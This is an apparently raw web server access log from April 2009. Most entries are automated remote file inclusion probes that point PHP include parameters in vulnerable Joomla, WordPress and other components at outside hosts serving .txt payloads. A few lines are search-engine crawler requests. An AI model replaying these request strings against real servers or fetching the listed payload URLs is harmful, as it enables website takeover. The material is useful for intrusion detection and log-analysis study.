121.165.73.157 - - [27/Apr/2009:14:24:51 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Apr/2009:14:24:52 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
212.48.105.12 - - [27/Apr/2009:14:24:58 -0500] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
212.48.105.12 - - [27/Apr/2009:14:24:59 -0500] "GET //admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
59.148.190.218 - - [27/Apr/2009:14:26:49 -0500] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
59.148.190.218 - - [27/Apr/2009:14:26:50 -0500] "GET //admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
119.63.193.56 - - [27/Apr/2009:14:28:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
68.112.43.9 - - [27/Apr/2009:14:29:14 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 200 187156 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:14:29:14 -0500] "GET //?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
201.66.107.26 - - [27/Apr/2009:14:38:02 -0500] "GET /logs/access_log.1236384000http://pbotdebian.50webs.com/pBotdebian%5B2%5D.txt? HTTP/1.1" 404 355 "-""Mozilla/3.0 (compatible; Indy Library)"
201.66.107.26 - - [27/Apr/2009:14:38:03 -0500] "GET /logs/access_log.1238630400http://pbotdebian.50webs.com/pBotdebian%5B2%5D.txt? HTTP/1.1" 404 355 "-""Mozilla/3.0 (compatible; Indy Library)"
201.66.107.26 - - [27/Apr/2009:14:38:29 -0500] "GET /logs/access_log.1236384000http://pbotdebian.50webs.com/pBotdebian%5B2%5D.txt? HTTP/1.1" 404 355 "-""Mozilla/3.0 (compatible; Indy Library)"
201.66.107.26 - - [27/Apr/2009:14:38:32 -0500] "GET /logs/access_log.1238630400http://pbotdebian.50webs.com/pBotdebian%5B2%5D.txt? HTTP/1.1" 404 355 "-""Mozilla/3.0 (compatible; Indy Library)"
217.172.186.250 - - [27/Apr/2009:14:40:07 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
217.172.186.250 - - [27/Apr/2009:14:40:07 -0500] "GET //include/lib.inc.php?site_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:14:40:17 -0500] "GET /logs//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:14:40:17 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:14:40:17 -0500] "GET //errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:14:40:17 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:14:40:45 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:14:40:45 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.232.102.70 - - [27/Apr/2009:14:40:52 -0500] "GET /logs/bbs/skin/zero_vote/login.php?dir=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
66.232.102.70 - - [27/Apr/2009:14:40:52 -0500] "GET /bbs/skin/zero_vote/login.php?dir=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.232.102.70 - - [27/Apr/2009:14:40:52 -0500] "GET /logs/access_log.1230681600/bbs/skin/zero_vote/login.php?dir=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.232.102.70 - - [27/Apr/2009:14:40:52 -0500] "GET /logs/access_log.1238284800/bbs/skin/zero_vote/login.php?dir=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:14:40:52 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:14:41:14 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 200 187156 "-""libwww-perl/5.805"
217.172.186.250 - - [27/Apr/2009:14:41:14 -0500] "GET //?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
219.85.63.226 - - [27/Apr/2009:14:41:20 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://data.donkeyhote.co.kr/xsl/copyright.txt?????? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
219.85.63.226 - - [27/Apr/2009:14:41:20 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://data.donkeyhote.co.kr/xsl/copyright.txt?????? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:14:42:09 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
68.112.43.9 - - [27/Apr/2009:14:42:11 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:14:42:12 -0500] "GET //include/lib.inc.php?site_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
78.129.214.105 - - [27/Apr/2009:14:43:33 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:33 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:33 -0500] "GET //errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:33 -0500] "GET /logs//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:44 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:45 -0500] "GET /logs//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:45 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:14:43:45 -0500] "GET //errors.php?error=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:14:43:52 -0500] "GET /send_reminders.php?includedir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:14:43:52 -0500] "GET /logs/access_log.1233705600/send_reminders.php?includedir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:14:43:52 -0500] "GET /logs/send_reminders.php?includedir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:14:44:01 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:14:44:25 -0500] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:14:44:28 -0500] "GET //admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:14:45:07 -0500] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:14:45:07 -0500] "GET //admin.cropcanvas.php?cropimagedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
125.251.133.3 - - [27/Apr/2009:14:45:13 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.71 - - [27/Apr/2009:14:45:40 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.800"
212.59.11.71 - - [27/Apr/2009:14:45:40 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.800"
125.251.133.3 - - [27/Apr/2009:14:47:59 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:14:47:59 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
68.112.43.9 - - [27/Apr/2009:14:48:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 200 187156 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:14:48:04 -0500] "GET //?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
125.251.133.3 - - [27/Apr/2009:14:48:08 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:14:48:23 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:14:48:27 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
92.52.110.170 - - [27/Apr/2009:14:49:37 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:14:49:37 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:14:49:37 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:14:50:30 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:14:50:30 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:14:50:30 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:14:52:50 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
60.251.60.100 - - [27/Apr/2009:15:10:40 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.69"
60.251.60.100 - - [27/Apr/2009:15:10:44 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.69"
77.221.130.18 - - [27/Apr/2009:15:12:37 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.221.130.18 - - [27/Apr/2009:15:12:37 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
77.221.130.18 - - [27/Apr/2009:15:12:37 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:15:18:44 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:15:18:44 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
218.150.79.146 - - [27/Apr/2009:15:23:06 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:15:23:06 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:15:23:06 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:15:24:38 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:15:24:38 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:15:24:38 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:15:26:24 -0500] "GET /logs/access_log.1239667200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:15:27:08 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 200 187151 "-""libwww-perl/5.805"
217.172.186.250 - - [27/Apr/2009:15:27:08 -0500] "GET /?INCLUDE_FOLDER=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
68.112.43.9 - - [27/Apr/2009:15:27:19 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 200 187151 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:15:27:19 -0500] "GET /?INCLUDE_FOLDER=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
218.150.79.146 - - [27/Apr/2009:15:27:59 -0500] "GET /logs/access_log.1239667200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.69.106.77 - - [27/Apr/2009:15:28:34 -0500] "GET /logs/parse/parser.php?WN_BASEDIR=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
200.69.106.77 - - [27/Apr/2009:15:28:34 -0500] "GET /parse/parser.php?WN_BASEDIR=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.69.106.77 - - [27/Apr/2009:15:29:32 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
200.69.106.77 - - [27/Apr/2009:15:29:32 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
77.221.130.18 - - [27/Apr/2009:15:45:46 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.18 - - [27/Apr/2009:15:45:46 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
77.221.130.18 - - [27/Apr/2009:15:45:46 -0500] "GET /logs/access_log.1236470400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
77.221.130.18 - - [27/Apr/2009:15:45:46 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
212.40.97.120 - - [27/Apr/2009:15:46:50 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.40.97.120 - - [27/Apr/2009:15:46:50 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
212.40.97.120 - - [27/Apr/2009:15:46:50 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
202.60.88.70 - - [27/Apr/2009:15:48:39 -0500] "GET /logs/config.php?_CCFG[_PKG_PATH_INCL]=http://armadaglass.webrok.co.uk/extra/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.60.88.70 - - [27/Apr/2009:15:48:39 -0500] "GET /config.php?_CCFG[_PKG_PATH_INCL]=http://armadaglass.webrok.co.uk/extra/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.60.88.70 - - [27/Apr/2009:15:48:39 -0500] "GET /logs/access_log.1239235200/config.php?_CCFG[_PKG_PATH_INCL]=http://armadaglass.webrok.co.uk/extra/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.251.60.100 - - [27/Apr/2009:15:51:52 -0500] "GET /logs/!rfihttp://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.69"
60.251.60.100 - - [27/Apr/2009:15:51:53 -0500] "GET /!rfihttp://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.69"
203.97.95.186 - - [27/Apr/2009:15:52:05 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:15:52:08 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
212.40.97.120 - - [27/Apr/2009:15:56:59 -0500] "GET /logs/access_log.1235088000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.55.208.139 - - [27/Apr/2009:15:57:20 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [27/Apr/2009:15:57:20 -0500] "GET /logs/access_log.1136419200 HTTP/1.1" 200 331 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [27/Apr/2009:15:57:22 -0500] "GET /logs/access_log.1145923200 HTTP/1.1" 200 402 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
206.223.166.210 - - [27/Apr/2009:16:01:25 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
206.223.166.210 - - [27/Apr/2009:16:01:25 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
206.223.166.210 - - [27/Apr/2009:16:01:25 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
206.223.166.210 - - [27/Apr/2009:16:01:25 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
83.170.112.151 - - [27/Apr/2009:16:06:41 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.170.112.151 - - [27/Apr/2009:16:06:41 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.170.112.151 - - [27/Apr/2009:16:06:41 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
83.170.112.151 - - [27/Apr/2009:16:06:41 -0500] "GET /logs/access_log.1236902400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
89.47.236.250 - - [27/Apr/2009:16:07:27 -0500] "GET /logs/config.php?_CCFG[_PKG_PATH_INCL]=http://armadaglass.webrok.co.uk/extra/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.47.236.250 - - [27/Apr/2009:16:07:27 -0500] "GET /logs/access_log.1239235200/config.php?_CCFG[_PKG_PATH_INCL]=http://armadaglass.webrok.co.uk/extra/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.47.236.250 - - [27/Apr/2009:16:07:27 -0500] "GET /config.php?_CCFG[_PKG_PATH_INCL]=http://armadaglass.webrok.co.uk/extra/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.30.142.126 - - [27/Apr/2009:16:11:56 -0500] "GET /logs/access_log.1114646400 HTTP/1.0" 200 1186 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.126 - - [27/Apr/2009:16:13:53 -0500] "GET /?S=A HTTP/1.0" 200 3233 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.222.131.35 - - [27/Apr/2009:16:14:58 -0500] "GET //errors.php?error=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:16:14:58 -0500] "GET /logs/access_log.1228176000//errors.php?error=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:16:14:58 -0500] "GET /logs//errors.php?error=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:16:15:00 -0500] "GET /logs/access_log.1226188800//errors.php?error=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:16:17:06 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:16:17:07 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:16:17:07 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.208.139 - - [27/Apr/2009:16:17:18 -0500] "GET /logs/access_log.1165968000 HTTP/1.1" 200 1344 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.251.133.3 - - [27/Apr/2009:16:17:44 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:16:17:44 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:16:17:45 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
